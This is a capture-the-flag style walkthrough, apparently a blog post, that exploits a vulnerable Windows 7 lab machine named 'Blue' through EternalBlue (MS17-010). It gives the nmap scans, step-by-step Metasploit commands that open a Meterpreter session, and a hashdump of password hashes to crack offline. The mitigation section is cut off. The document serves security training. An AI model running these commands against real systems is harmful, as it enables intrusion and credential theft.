Blue is a Windows machine that has the infamous EternalBlue vulnerability (MS17-010). This walkthrough will guide you through the complete exploitation process from reconnaissance to gaining system access.
First, import the machine in VMware or VirtualBox and set the network adapter to NAT Network to solve connectivity seamlessly.
ipconfig to get the Blue IP addressifconfig to find your Kali IP
Next, we'll scan for open ports using Network Mapper (Nmap):
nmap 10.0.2.3
nmap -p 135,139,445,5357 -A 10.0.2.3
After discovering the target is running Windows 7 Ultimate 7601 Service Pack 1, I searched for exploits related to this version.
This version of Windows is vulnerable to the exploit called MS17-010, also known as EternalBlue. Since we found a Rapid7 result and Rapid7 owns Metasploit Framework, we'll use Metasploit for exploitation.
Open Metasploit Framework in Kali Linux:
msfconsole
search eternalblue
use 0
show options
set rhosts 10.0.2.3
Before exploiting, it's good practice to verify the target is vulnerable:
check
Result: The target appears to be vulnerable! ✅
exploit
or
run
Congratulations! We have successfully exploited the Blue machine and obtained a Meterpreter session.
With system-level access, we can dump user password hashes:
hashdump
These hashes can be cracked offline using tools like John the Ripper or Hashcat (more on this in future walkthroughs).
check command in Metasploit to verify vulnerability before exploitationTo protect against EternalBlue attacks: